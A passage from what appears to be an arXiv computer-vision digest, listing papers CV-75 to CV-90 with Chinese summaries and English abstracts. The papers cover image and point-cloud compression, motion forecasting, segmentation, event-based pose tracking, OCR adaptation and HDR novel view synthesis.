Abstract:Accurate cardiac ultrasound segmentation is essential for reliable assessment of ventricular function in intelligent healthcare systems. However, echocardiographic images are challenging due to low contrast, speckle noise, irregular boundaries, and domain shifts across devices and patient populations. Existing methods, largely based on appearance-driven learning, often fail to preserve boundary precision and structural consistency under these conditions. To address these issues, we propose a Contour-Guided Query Refinement Network (CGQR-Net) for boundary-aware cardiac ultrasound segmentation. The framework integrates multi-resolution feature representations with contour-derived structural priors. An HRNet backbone preserves high-resolution spatial details while capturing multi-scale context. A coarse segmentation is first generated, from which anatomical contours are extracted and encoded into learnable query embeddings. These contour-guided queries interact with fused feature maps via cross-attention, enabling structure-aware refinement that improves boundary delineation and reduces noise artifacts. A dual-head supervision strategy jointly optimizes segmentation and boundary prediction to enforce structural consistency. The proposed method is evaluated on the CAMUS dataset and further validated on the CardiacNet dataset to assess cross-dataset generalization. Experimental results demonstrate improved segmentation accuracy, enhanced boundary precision, and robust performance across varying imaging conditions. These results highlight the effectiveness of integrating contour-level structural information with feature-level representations for reliable cardiac ultrasound segmentation.
[CV-75] RAWIC: Bit-Depth Adaptive Lossless Raw Image Compression ICME2026
【速读】:该论文旨在解决原始图像(raw image)在存储与传输中面临的挑战,特别是针对不同相机传感器的位深度(bit depth)差异以及现有学习型无损压缩方法主要局限于8位sRGB图像的问题。传统无损压缩算法难以高效处理高动态范围、多比特深度的Bayer模式原始数据,而现有的重建方法则通常为有损且依赖特定相机假设。解决方案的关键在于提出RAWIC框架,其核心创新是将单通道Bayer数据转换为四通道RGGB格式并按块分割,通过计算每块的位深度作为辅助输入,设计了一个位深度自适应的熵模型,从而实现对来自多种相机设备和位深度的原始图像进行统一高效的无损压缩。该架构使单一模型具备跨设备泛化能力,并在实验中相较JPEG-XL平均降低7.7%码率。
链接: https://arxiv.org/abs/2603.28105
作者: Chunhang Zheng,Tongda Xu,Mingli Xie,Yan Wang,Dou Li
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by ICME 2026
Abstract:Raw images preserve linear sensor measurements and high bit-depth information crucial for advanced vision tasks and photography applications, yet their storage remains challenging due to large file sizes, varying bit depths, and sensor-dependent characteristics. Existing learned lossless compression methods mainly target 8-bit sRGB images, while raw reconstruction approaches are inherently lossy and rely on camera-specific assumptions. To address these challenges, we introduce RAWIC, a bit-depth-adaptive learned lossless compression framework for Bayer-pattern raw images. We first convert single-channel Bayer data into a four-channel RGGB format and partition it into patches. For each patch, we compute its bit depth and use it as auxiliary input to guide compression. A bit-depth-adaptive entropy model is then designed to estimate patch distributions conditioned on their bit depths. This architecture enables a single model to handle raw images from diverse cameras and bit depths. Experiments show that RAWIC consistently surpasses traditional lossless codecs, achieving an average 7.7% bitrate reduction over JPEG-XL. Our code is available at this https URL.
[CV-76] Octree-based Learned Point Cloud Geometry Compression: A Lossy Perspective
【速读】:该论文旨在解决基于八叉树(octree)的点云压缩方法在有损压缩场景下的性能瓶颈问题。传统方法依赖于无损八叉树表示结合量化步长调整来实现有损压缩,但容易因量化导致大量点云数据丢失,从而引发严重失真。针对这一问题,论文提出两类关键解决方案:其一,对于物体类点云,设计了一种新的叶节点有损压缩方法,通过在叶节点上进行位级编码(bit-wise coding)和二值预测(binary prediction),实现高效有损压缩;其二,针对激光雷达(LiDAR)点云,提出一种简单而有效的率控制方法,支持可变比特率传输,并在无需微调的情况下实现约1%的比特误差率(bit error rate)。这两项创新显著提升了八叉树结构在有损压缩中的适用性和性能表现。
链接: https://arxiv.org/abs/2603.28095
作者: Kaiyu Zheng,Wei Gao,Huiming Zheng
机构: Peking University (北京大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Octree-based context learning has recently become a leading method in point cloud compression. However, its potential on lossy compression remains undiscovered. The traditional lossy compression paradigm using lossless octree representation with quantization step adjustment may result in severe distortions due to massive missing points in quantization. Therefore, we analyze data characteristics of different point clouds and propose lossy approaches specifically. For object point clouds that suffer from quantization step adjustment, we propose a new leaf nodes lossy compression method, which achieves lossy compression by performing bit-wise coding and binary prediction on leaf nodes. For LiDAR point clouds, we explore variable rate approaches and propose a simple but effective rate control method. Experimental results demonstrate that the proposed leaf nodes lossy compression method significantly outperforms the previous octree-based method on object point clouds, and the proposed rate control method achieves about 1% bit error without finetuning on LiDAR point clouds.
[CV-77] SHARP: Short-Window Streaming for Accurate and Robust Prediction in Motion Forecasting CVPR2026
【速读】:该论文旨在解决动态交通环境中运动预测模型在面对异构观测长度时性能下降的问题,尤其是在流式推理(streaming inference)场景下,传统方法难以保持跨不同观测时长的预测一致性。解决方案的关键在于提出一种新颖的流式运动预测框架,通过增量处理连续观测窗口,并引入实例感知的上下文流(instance-aware context streaming)机制来持续维护和更新智能体的潜在表示(latent agent representations),从而适应场景演化;同时设计双训练目标以确保在多种观测时长下均能实现一致的预测精度,最终在Argoverse 2等多智能体基准上实现了最先进性能且延迟极低,具备实际部署潜力。
链接: https://arxiv.org/abs/2603.28091
作者: Alexander Prutsch,Christian Fruhwirth-Reisinger,David Schinagl,Horst Possegger
机构: Graz University of Technology (格拉茨工业大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注: CVPR 2026. Project page at this https URL
Abstract:In dynamic traffic environments, motion forecasting models must be able to accurately estimate future trajectories continuously. Streaming-based methods are a promising solution, but despite recent advances, their performance often degrades when exposed to heterogeneous observation lengths. To address this, we propose a novel streaming-based motion forecasting framework that explicitly focuses on evolving scenes. Our method incrementally processes incoming observation windows and leverages an instance-aware context streaming to maintain and update latent agent representations across inference steps. A dual training objective further enables consistent forecasting accuracy across diverse observation horizons. Extensive experiments on Argoverse 2, nuScenes, and Argoverse 1 demonstrate the robustness of our approach under evolving scene conditions and also on the single-agent benchmarks. Our model achieves state-of-the-art performance in streaming inference on the Argoverse 2 multi-agent benchmark, while maintaining minimal latency, highlighting its suitability for real-world deployment.
[CV-78] o View Transform or Not to View Transform: NeRF-based Pre-training Perspective ICLR’26
【速读】:该论文旨在解决现有基于神经辐射场(NeRF)的预训练方法在自动驾驶3D感知任务中因与视图变换(view transformation)耦合而导致的先验冲突问题,即离散刚性表示与连续自适应函数假设之间的不一致,进而引发模糊且歧义的3D表征,限制了场景理解能力。此外,传统方法在下游任务中丢弃预训练的NeRF网络,造成对增强3D表征利用效率低下。解决方案的关键在于提出一种新型的NeRF-Resembled Point-based 3D检测器(NeRP3D),其通过学习连续的3D表示避免了视图变换带来的先验错配,并保留预训练的NeRF网络用于所有任务,从而在场景重建和目标检测任务中均展现出更强的性能潜力。
链接: https://arxiv.org/abs/2603.28090
作者: Hyeonjun Jeong,Juyeb Shin,Dongsuk Kum
机构: KAIST(韩国科学技术院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: The Fourteenth International Conference on Learning Representations (ICLR’26)
Abstract:Neural radiance fields (NeRFs) have emerged as a prominent pre-training paradigm for vision-centric autonomous driving, which enhances 3D geometry and appearance understanding in a fully self-supervised manner. To apply NeRF-based pretraining to 3D perception models, recent approaches have simply applied NeRFs to volumetric features obtained from view transformation. However, coupling NeRFs with view transformation inherits conflicting priors; view transformation imposes discrete and rigid representations, whereas radiance fields assume continuous and adaptive functions. When these opposing assumptions are forced into a single pipeline, the misalignment surfaces as blurry and ambiguous 3D representations that ultimately limit 3D scene understanding. Moreover, the NeRF network for pre-training is discarded during downstream tasks, resulting in inefficient utilization of enhanced 3D representations through NeRF. In this paper, we propose a novel NeRF-Resembled Point-based 3D detector that can learn continuous 3D representation and thus avoid the misaligned priors from view transformation. NeRP3D preserves the pre-trained NeRF network regardless of the tasks, inheriting the principle of continuous 3D representation learning and leading to greater potentials for both scene reconstruction and detection tasks. Experiments on nuScenes dataset demonstrate that our proposed approach significantly improves previous state-of-the-art methods, outperforming not only pretext scene reconstruction tasks but also downstream detection tasks.
[CV-79] GEMS: Agent -Native Multimodal Generation with Memory and Skills
【速读】:该论文旨在解决当前多模态生成模型在处理复杂指令和特定下游任务时表现不足的问题,尤其是在通用任务与专业场景之间存在能力鸿沟。其解决方案的关键在于提出GEMS(Agent-Native Multimodal Generation with Memory and Skills)框架,该框架通过三个核心组件实现突破:Agent Loop构建了基于多智能体的闭环优化机制以持续提升生成质量;Agent Memory提供分层持久化记忆结构,存储事实状态与压缩的经验摘要,从而增强全局优化视角并减少冗余;Agent Skill则引入可扩展的领域专用技能库,支持按需加载,使系统能够灵活应对多样化下游应用。实验证明,该框架在多个生成后端上均显著提升性能,甚至使轻量级6B模型超越现有SOTA模型。
链接: https://arxiv.org/abs/2603.28088
作者: Zefeng He,Siyuan Huang,Xiaoye Qu,Yafu Li,Tong Zhu,Yu Cheng,Yang Yang
机构: Shanghai AI Laboratory (上海人工智能实验室); Nanjing University (南京大学); Shanghai Jiao Tong University (上海交通大学); CUHK (香港中文大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Project Page: this https URL
Abstract:Recent multimodal generation models have achieved remarkable progress on general-purpose generation tasks, yet continue to struggle with complex instructions and specialized downstream tasks. Inspired by the success of advanced agent frameworks such as Claude Code, we propose \textbfGEMS (Agent-Native Multimodal \textbfGEneration with \textbfMemory and \textbfSkills), a framework that pushes beyond the inherent limitations of foundational models on both general and downstream tasks. GEMS is built upon three core components. Agent Loop introduces a structured multi-agent framework that iteratively improves generation quality through closed-loop optimization. Agent Memory provides a persistent, trajectory-level memory that hierarchically stores both factual states and compressed experiential summaries, enabling a global view of the optimization process while reducing redundancy. Agent Skill offers an extensible collection of domain-specific expertise with on-demand loading, allowing the system to effectively handle diverse downstream applications. Across five mainstream tasks and four downstream tasks, evaluated on multiple generative backends, GEMS consistently achieves significant performance gains. Most notably, it enables the lightweight 6B model Z-Image-Turbo to surpass the state-of-the-art Nano Banana 2 on GenEval2, demonstrating the effectiveness of agent harness in extending model capabilities beyond their original limits.
[CV-80] MolmoPoint: Better Pointing for VLMs with Grounding Tokens
【速读】:该论文旨在解决视觉语言模型(Vision-Language Models, VLMs)在图像和视频指代表任务中依赖复杂坐标系统生成文本坐标而导致的高token消耗与低效率问题。现有方法通过输出坐标作为指针,不仅需要学习复杂的坐标映射关系,还因冗长的文本输出限制了模型性能与可扩展性。其解决方案的关键在于提出一种更直观的“视觉标记选择”机制:模型生成特殊的指向标记(pointing token),通过交叉注意力机制直接从输入图像或视频的视觉标记中选择包含目标概念的区域;进一步地,通过附加两个特殊标记实现细粒度定位——首个标记确定粗粒度区域,第二个标记细化至子patch内的具体位置,第三个标记指定该子patch内部的位置。此外,采用顺序生成策略、编码前一位置的相对信息,并引入“无更多点”类别以提升一致性与准确性。该设计显著提升了图像、GUI界面及视频指针任务的性能,同时展现出更高的样本效率。
链接: https://arxiv.org/abs/2603.28069
作者: Christopher Clark,Yue Yang,Jae Sung Park,Zixian Ma,Jieyu Zhang,Rohun Tripathi,Mohammadreza Salehi,Sangho Lee,Taira Anderson,Winson Han,Ranjay Krishna
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Grounding has become a fundamental capability of vision-language models (VLMs). Most existing VLMs point by generating coordinates as part of their text output, which requires learning a complicated coordinate system and results in a high token count. Instead, we propose a more intuitive pointing mechanism that directly selects the visual tokens that contain the target concept. Our model generates a special pointing token that cross-attends to the input image or video tokens and selects the appropriate one. To make this model more fine-grained, we follow these pointing tokens with an additional special token that selects a fine-grained subpatch within the initially selected region, and then a third token that specifies a location within that subpatch. We further show that performance improves by generating points sequentially in a consistent order, encoding the relative position of the previously selected point, and including a special no-more-points class when selecting visual tokens. Using this method, we set a new state-of-the-art on image pointing (70.7% on PointBench), set a new state-of-the-art among fully open models on GUI pointing (61.1% on ScreenSpotPro), and improve video pointing (59.1% human preference win rate vs. a text coordinate baseline) and tracking (+6.3% gain on Molmo2Track). We additionally show that our method achieves much higher sample efficiency and discuss the qualitative differences that emerge from this design change.
[CV-81] AIBench: Evaluating Visual-Logical Consistency in Academic Illustration Generation
【速读】:该论文旨在解决当前生成式 AI (Generative AI) 在学术插图生成任务中缺乏系统性评估标准的问题,尤其是如何准确衡量生成插图在逻辑一致性与美学质量上的表现。其关键解决方案是提出 AIBench——首个结合视觉问答(VQA)与视觉语言模型(VLM)的基准测试框架:通过设计基于论文方法部分逻辑图的四级问题体系来量化评估插图与原文在不同粒度上的逻辑一致性,同时利用 VLM 评估插图的美学品质。该方法显著降低了对评判者 VLM 多模态理解能力的依赖,并揭示出当前模型在复杂推理与高密度内容生成能力上的显著差距,以及逻辑与美学难以协同优化的挑战。
链接: https://arxiv.org/abs/2603.28068
作者: Zhaohe Liao,Kaixun Jiang,Zhihang Liu,Yujie Wei,Junqiu Yu,Quanhao Li,Hong-Tao Yu,Pandeng Li,Yuzheng Wang,Zhen Xing,Shiwei Zhang,Chen-Wei Xie,Yun Zheng,Xihui Liu
机构: Tongyi Lab, Alibaba Group; SJTU; FDU; USTC; SEU; HKU
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Although image generation has boosted various applications via its rapid evolution, whether the state-of-the-art models are able to produce ready-to-use academic illustrations for papers is still largely this http URL comparing or evaluating the illustration with VLM is native but requires oracle multi-modal understanding ability, which is unreliable for long and complex texts and illustrations. To address this, we propose AIBench, the first benchmark using VQA for evaluating logic correctness of the academic illustrations and VLMs for assessing aesthetics. In detail, we designed four levels of questions proposed from a logic diagram summarized from the method part of the paper, which query whether the generated illustration aligns with the paper on different scales. Our VQA-based approach raises more accurate and detailed evaluations on visual-logical consistency while relying less on the ability of the judger VLM. With our high-quality AIBench, we conduct extensive experiments and conclude that the performance gap between models on this task is significantly larger than general ones, reflecting their various complex reasoning and high-density generation ability. Further, the logic and aesthetics are hard to optimize simultaneously as in handcrafted illustrations. Additional experiments further state that test-time scaling on both abilities significantly boosts the performance on this task.
[CV-82] textit4DSurf: High-Fidelity Dynamic Scene Surface Reconstruction CVPR2026
【速读】:该论文旨在解决动态场景表面重建中因大尺度形变导致的时间不一致性问题,现有基于高斯泼溅(Gaussian Splatting, GS)的方法通常仅适用于单个物体或小变形场景,难以保持长时间序列下的几何一致性。其解决方案的关键在于提出一个统一的框架 4DSurf,核心创新是引入由高斯形变诱导的有符号距离函数流正则化(Gaussian Deformations Induced Signed Distance Function Flow Regularization),以约束高斯点的运动与表面演化对齐;同时设计重叠分段划分策略(Overlapping Segment Partitioning),将序列分割为具有小变形的重叠片段,并通过共享重叠时间帧实现几何信息的逐段传递,从而有效处理大形变并提升时序一致性。
链接: https://arxiv.org/abs/2603.28064
作者: Renjie Wu,Hongdong Li,Jose M. Alvarez,Miaomiao Liu
机构: Australian National University (澳大利亚国立大学); NVIDIA (英伟达); Amazon (亚马逊)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026
Abstract:This paper addresses the problem of dynamic scene surface reconstruction using Gaussian Splatting (GS), aiming to recover temporally consistent geometry. While existing GS-based dynamic surface reconstruction methods can yield superior reconstruction, they are typically limited to either a single object or objects with only small deformations, struggling to maintain temporally consistent surface reconstruction of large deformations over time. We propose ``\textit4DSurf’', a novel and unified framework for generic dynamic surface reconstruction that does not require specifying the number or types of objects in the scene, can handle large surface deformations and temporal inconsistency in reconstruction. The key innovation of our framework is the introduction of Gaussian deformations induced Signed Distance Function Flow Regularization that constrains the motion of Gaussians to align with the evolving surface. To handle large deformations, we introduce an Overlapping Segment Partitioning strategy that divides the sequence into overlapping segments with small deformations and incrementally passes geometric information across segments through the shared overlapping timestep. Experiments on two challenging dynamic scene datasets, Hi4D and CMU Panoptic, demonstrate that our method outperforms state-of-the-art surface reconstruction methods by 49% and 19% in Chamfer distance, respectively, and achieves superior temporal consistency under sparse-view settings.
[CV-83] Object Detection Based on Distributed Convolutional Neural Networks
【速读】:该论文旨在解决基于深度学习的物体检测问题,特别是如何利用分布式卷积神经网络(DisCNN)实现高效且准确的目标检测。其解决方案的关键在于:利用DisCNN输出向量对特定正类别的特征具有正单调性(positive monotonicity)的性质,通过识别不同尺度下高分区域(patch),并将其重叠形成边界框来定位目标对象。该方法无需复杂的区域建议机制,仅需以目标为中心的图像数据进行训练,即可实现多类别并行检测和单类快速检测,得益于其轻量化模型结构显著提升检测效率。
链接: https://arxiv.org/abs/2603.28050
作者: Liang Sun
机构: Shandong University of Science and Technology (山东科技大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Based on the Distributed Convolutional Neural Network(DisCNN), a straightforward object detection method is proposed. The modules of the output vector of a DisCNN with respect to a specific positive class are positively monotonic with the presence probabilities of the positive features. So, by identifying all high-scoring patches across all possible scales, the positive object can be detected by overlapping them to form a bounding box. The essential idea is that the object is detected by detecting its features on multiple scales, ranging from specific sub-features to abstract features composed of these sub-features. Training DisCNN requires only object-centered image data with positive and negative class labels. The detection process for multiple positive classes can be conducted in parallel to significantly accelerate it, and also faster for single-object detection because of its lightweight model architecture.
[CV-84] Drift-AR: Single-Step Visual Autoregressive Generation via Anti-Symmetric Drifting
【速读】:该论文旨在解决自回归-扩散(AR-Diffusion)混合范式中存在的双重速度瓶颈问题:一是自回归(AR)阶段的序列生成效率低下,二是扩散视觉解码阶段需多次迭代去噪导致计算开销大。现有方法分别优化两个阶段,缺乏统一的设计原则。其解决方案的关键在于发现并利用连续空间AR模型中每位置的预测熵(prediction entropy)作为统一信号——该熵不仅反映AR阶段的生成不确定性,还与视觉解码阶段所需的修正强度相关。基于此,作者提出Drift-AR框架:1)在AR阶段引入熵感知的投机解码(Entropy-Informed Speculative Decoding),通过因果归一化熵损失对齐草稿与目标熵分布,减少无效草稿拒绝;2)在视觉解码阶段将熵重新解释为反向漂移场的初始状态方差,高熵区域驱动更强的漂移以逼近数据流形,低熵区域漂移趋近于零,从而实现单步(1-NFE)解码,无需迭代去噪或蒸馏。两个阶段共享同一熵信号,计算成本无额外增加,实验表明该方案在MAR、TransDiff和NextStep-1上实现3.8–5.5倍加速,且保持原始质量水平。
链接: https://arxiv.org/abs/2603.28049
作者: Zhen Zou,Xiaoxiao Ma,Mingde Yao,Jie Huang,LinJiang Huang,Feng Zhao
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Autoregressive (AR)-Diffusion hybrid paradigms combine AR’s structured semantic modeling with diffusion’s high-fidelity synthesis, yet suffer from a dual speed bottleneck: the sequential AR stage and the iterative multi-step denoising of the diffusion vision decode stage. Existing methods address each in isolation without a unified principle design. We observe that the per-position \emphprediction entropy of continuous-space AR models naturally encodes spatially varying generation uncertainty, which simultaneously governing draft prediction quality in the AR stage and reflecting the corrective effort required by vision decoding stage, which is not fully explored before. Since entropy is inherently tied to both bottlenecks, it serves as a natural unifying signal for joint acceleration. In this work, we propose \textbfDrift-AR, which leverages entropy signal to accelerate both stages: 1) for AR acceleration, we introduce Entropy-Informed Speculative Decoding that align draft–target entropy distributions via a causal-normalized entropy loss, resolving the entropy mismatch that causes excessive draft rejection; 2) for visual decoder acceleration, we reinterpret entropy as the \emphphysical variance of the initial state for an anti-symmetric drifting field – high-entropy positions activate stronger drift toward the data manifold while low-entropy positions yield vanishing drift – enabling single-step (1-NFE) decoding without iterative denoising or distillation. Moreover, both stages share the same entropy signal, which is computed once with no extra cost. Experiments on MAR, TransDiff, and NextStep-1 demonstrate 3.8–5.5 \times speedup with genuine 1-NFE decoding, matching or surpassing original quality. Code will be available at this https URL.
[CV-85] Event6D: Event-based Novel Object 6D Pose Tracking CVPR2026
【速读】:该论文旨在解决在高速动态场景中,传统RGB和深度图像流水线因运动模糊和大像素位移而导致6D目标位姿跟踪性能下降的问题。其核心解决方案是提出EventTrack6D框架,该框架利用事件相机(event camera)的微秒级延迟特性,通过条件于最新深度测量的双重建机制,从稀疏事件流中恢复密集的光度和几何线索,从而实现对新物体无需特定训练即可进行高帧率(>120 FPS)且时序一致的6D位姿跟踪。关键创新在于无需对象特定训练即可泛化到新物体,并在合成数据上训练后直接应用于真实场景而无需微调。
链接: https://arxiv.org/abs/2603.28045
作者: Jae-Young Kang,Hoonehee Cho,Taeyeop Lee,Minjun Kang,Bowen Wen,Youngho Kim,Kuk-Jin Yoon
机构: KAIST (韩国科学技术院); NVIDIA (英伟达)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by CVPR2026
Abstract:Event cameras provide microsecond latency, making them suitable for 6D object pose tracking in fast, dynamic scenes where conventional RGB and depth pipelines suffer from motion blur and large pixel displacements. We introduce EventTrack6D, an event-depth tracking framework that generalizes to novel objects without object-specific training by reconstructing both intensity and depth at arbitrary timestamps between depth frames. Conditioned on the most recent depth measurement, our dual reconstruction recovers dense photometric and geometric cues from sparse event streams. Our EventTrack6D operates at over 120 FPS and maintains temporal consistency under rapid motion. To support training and evaluation, we introduce a comprehensive benchmark suite: a large-scale synthetic dataset for training and two complementary evaluation sets, including real and simulated event datasets. Trained exclusively on synthetic data, EventTrack6D generalizes effectively to real-world scenarios without fine-tuning, maintaining accurate tracking across diverse objects and motion patterns. Our method and datasets validate the effectiveness of event cameras for event-based 6D pose tracking of novel objects. Code and datasets are publicly available at this https URL.
[CV-86] Effort-Based Criticality Metrics for Evaluating 3D Perception Errors in Autonomous Driving
【速读】:该论文旨在解决现有碰撞紧迫性度量(如时间到碰撞,Time-to-Collision, TTC)无法区分误报(False Positive, FP)与漏报(False Negative, FN)感知错误后果的问题,从而导致对自动驾驶系统中感知误差的安全影响评估不准确。解决方案的关键在于提出三种基于努力(effort-based)的新度量指标:False Speed Reduction (FSR) 衡量因持续伪检测造成的累积速度损失;Maximum Deceleration Rate (MDR) 表征因遗漏物体在恒定加速度模型下产生的最大制动需求;Lateral Evasion Acceleration (LEA) 则结合可达性分析与横向避让动力学,量化避免预测碰撞所需的最小转向努力。此外,通过基于可达性的椭球形碰撞过滤器确保仅动态可行威胁被评分,并实现帧级匹配与轨迹级聚合,从而更精准地识别关键感知失败,实验表明65–93%的感知错误为非关键性,且所提指标能捕捉传统时间或减速度相关度量无法获取的安全相关信息。
链接: https://arxiv.org/abs/2603.28029
作者: Sharang Kaul,Simon Bultmann,Mario Berk,Abhinav Valada
机构: CARIAD SE (CARIAD SE); University of Freiburg (弗莱堡大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注:
Abstract:Criticality metrics such as time-to-collision (TTC) quantify collision urgency but conflate the consequences of false-positive (FP) and false-negative (FN) perception errors. We propose two novel effort-based metrics: False Speed Reduction (FSR), the cumulative velocity loss from persistent phantom detections, and Maximum Deceleration Rate (MDR), the peak braking demand from missed objects under a constant-acceleration model. These longitudinal metrics are complemented by Lateral Evasion Acceleration (LEA), adapted from prior lateral evasion kinematics and coupled with reachability-based collision timing to quantify the minimum steering effort to avoid a predicted collision. A reachability-based ellipsoidal collision filter ensures only dynamically plausible threats are scored, with frame-level matching and track-level aggregation. Evaluation of different perception pipelines on nuScenes and Argoverse~2 shows that 65-93% of errors are non-critical, and Spearman correlation analysis confirms that all three metrics capture safety-relevant information inaccessible to established time-based, deceleration-based, or normalized criticality measures, enabling targeted mining of the most critical perception failures.
[CV-87] Efficient Domain Adaptation for Text Line Recognition via Decoupled Language Models
【速读】:该论文旨在解决光学字符识别(Optical Character Recognition, OCR)系统在实际应用中因计算资源需求过高而导致的可及性问题,尤其是针对缺乏大规模标注数据和高性能计算能力的研究人员与数字人文学者。其核心挑战在于现有端到端Transformer架构虽能实现接近最先进(State-of-the-Art, SOTA)的准确率,但需数百GPU小时进行领域适应,难以普及。解决方案的关键在于提出一种模块化检测-校正框架:将轻量级视觉字符检测(与领域无关)与基于预训练序列模型(如T5、ByT5、BART)的语言校正分离,并通过合成噪声数据训练校正器,从而实现无需目标图像标注的无监督领域自适应。该设计显著降低计算成本约95%,同时保持接近端到端方法的性能,验证了分阶段处理在OCR中的有效性与高效性。
链接: https://arxiv.org/abs/2603.28028
作者: Arundhathi Dev,Justin Zhan
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: Accepted to the International Conference on Machine Intelligence Theory and Applications (MiTA 2026)
Abstract:Optical character recognition remains critical infrastructure for document digitization, yet state-of-the-art performance is often restricted to well-resourced institutions by prohibitive computational barriers. End-to-end transformer architectures achieve strong accuracy but demand hundreds of GPU hours for domain adaptation, limiting accessibility for practitioners and digital humanities scholars. We present a modular detection-and-correction framework that achieves near-SOTA accuracy with single-GPU training. Our approach decouples lightweight visual character detection (domain-agnostic) from domain-specific linguistic correction using pretrained sequence models including T5, ByT5, and BART. By training the correctors entirely on synthetic noise, we enable annotation-free domain adaptation without requiring labeled target images. Evaluating across modern clean handwriting, cursive script, and historical documents, we identify a critical “Pareto frontier” in architecture selection: T5-Base excels on modern text with standard vocabulary, whereas ByT5-Base dominates on historical documents by reconstructing archaic spellings at the byte level. Our results demonstrate that this decoupled paradigm matches end-to-end transformer accuracy while reducing compute by approximately 95%, establishing a viable, resource-efficient alternative to monolithic OCR architectures.
[CV-88] Adapting SAM to Nuclei Instance Segmentation and Classification via Cooperative Fine-Grained Refinement
【速读】:该论文旨在解决将通用图像分割模型Segment Anything Model (SAM)直接应用于医学图像中细胞核实例分割时面临的两大问题:一是SAM缺乏对局部结构特征的充分感知能力,这在细胞核分割任务中至关重要;二是全参数微调SAM所需计算成本过高,难以高效迁移其强大的先验知识。解决方案的关键在于提出一种参数高效的微调框架——协同细粒度精化SAM(Cooperative Fine-Grained Refinement of SAM),其核心创新包括三个模块:1)多尺度自适应局部感知适配器(Multi-scale Adaptive Local-aware Adapter),通过动态生成多尺度卷积核,在冻结SAM主干网络基础上以极少参数增强局部结构感知能力;2)分层调制融合模块(Hierarchical Modulated Fusion Module),动态聚合多层编码器特征以保留精细空间细节;3)边界引导掩码精化模块(Boundary-Guided Mask Refinement),利用多上下文边界线索与语义特征显式监督融合,生成边界聚焦信号以优化初始掩码预测,实现更清晰的轮廓分割。这三个组件协同作用,显著提升了SAM在细胞核实例分割任务中的局部感知精度、空间细节保持能力和边界清晰度。
链接: https://arxiv.org/abs/2603.28027
作者: Jingze Su,Tianle Zhu,Jiaxin Cai,Zhiyi Wang,Qi Li,Xiao Zhang,Tong Tong,Shu Wang,Wenxi Liu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 18 pages, 10 figures, 12 tables
Abstract:Nuclei instance segmentation is critical in computational pathology for cancer diagnosis and prognosis. Recently, the Segment Anything Model has demonstrated exceptional performance in various segmentation tasks, leveraging its rich priors and powerful global context modeling capabilities derived from large-scale pre-training on natural images. However, directly applying SAM to the medical imaging domain faces significant limitations: it lacks sufficient perception of the local structural features that are crucial for nuclei segmentation, and full fine-tuning for downstream tasks requires substantial computational costs. To efficiently transfer SAM’s robust prior knowledge to nuclei instance segmentation while supplementing its task-aware local perception, we propose a parameter-efficient fine-tuning framework, named Cooperative Fine-Grained Refinement of SAM, consisting of three core components: 1) a Multi-scale Adaptive Local-aware Adapter, which enables effective capability transfer by augmenting the frozen SAM backbone with minimal parameters and instilling a powerful perception of local structures through dynamically generated, multi-scale convolutional kernels; 2) a Hierarchical Modulated Fusion Module, which dynamically aggregates multi-level encoder features to preserve fine-grained spatial details; and 3) a Boundary-Guided Mask Refinement, which integrates multi-context boundary cues with semantic features through explicit supervision, producing a boundary-focused signal to refine initial mask predictions for sharper delineation. These three components work cooperatively to enhance local perception, preserve spatial details, and refine boundaries, enabling SAM to perform accurate nuclei instance segmentation directly.
[CV-89] SegRGB-X: General RGB-X Semantic Segmentation Model
【速读】:该论文旨在解决跨任意传感器模态(如事件、热成像、深度、偏振和光场等)的语义分割任务中因传感器特性差异导致的挑战,以及传统方法在不同模态下需重复开发所带来的冗余工作。其核心解决方案是提出一个通用的任意模态语义分割框架,关键创新包括:(1) 模态感知的CLIP(Modality-aware CLIP, MA-CLIP),通过LoRA微调提供模态特定的场景理解引导;(2) 模态对齐嵌入(Modality-aligned Embeddings),用于捕捉细粒度特征;(3) 领域特定细化模块(Domain-specific Refinement Module, DSRM),实现动态特征调整。该框架在五个不同模态的数据集上取得65.03%的平均交并比(mIoU),超越了现有的专用多模态方法。
链接: https://arxiv.org/abs/2603.28023
作者: Jiong Liu,Yingjie Xu,Xingcheng Zhou,Rui Song,Walter Zimmer,Alois Knoll,Hu Cao
机构: Technical University of Munich (慕尼黑工业大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Submitted to IEEE TITS
Abstract:Semantic segmentation across arbitrary sensor modalities faces significant challenges due to diverse sensor characteristics, and the traditional configurations for this task result in redundant development efforts. We address these challenges by introducing a universal arbitrary-modal semantic segmentation framework that unifies segmentation across multiple modalities. Our approach features three key innovations: (1) the Modality-aware CLIP (MA-CLIP), which provides modality-specific scene understanding guidance through LoRA fine-tuning; (2) Modality-aligned Embeddings for capturing fine-grained features; and (3) the Domain-specific Refinement Module (DSRM) for dynamic feature adjustment. Evaluated on five diverse datasets with different complementary modalities (event, thermal, depth, polarization, and light field), our model surpasses specialized multi-modal methods and achieves state-of-the-art performance with a mIoU of 65.03%. The codes will be released upon acceptance.
[CV-90] Physically Inspired Gaussian Splatting for HDR Novel View Synthesis CVPR2026
【速读】:该论文旨在解决高动态范围新视角合成(HDR-NVS)中难以准确建模环境光照依赖外观变化的问题,尤其是在低曝光或高曝光区域因梯度不足导致的重建质量下降问题。其核心解决方案是提出PhysHDR-GS框架,通过引入互补的图像-曝光(IE)分支与高斯-光照(GI)分支,分别负责忠实还原标准相机观测和捕捉光照依赖的外观变化;同时设计了跨分支HDR一致性损失以提供显式HDR监督,并采用光照引导的梯度缩放策略缓解曝光偏差引起的梯度稀释问题,从而实现高质量、实时的HDR细节重建。
链接: https://arxiv.org/abs/2603.28020
作者: Huimin Zeng,Yue Bai,Hailing Wang,Yun Fu
机构: Northeastern University (东北大学)
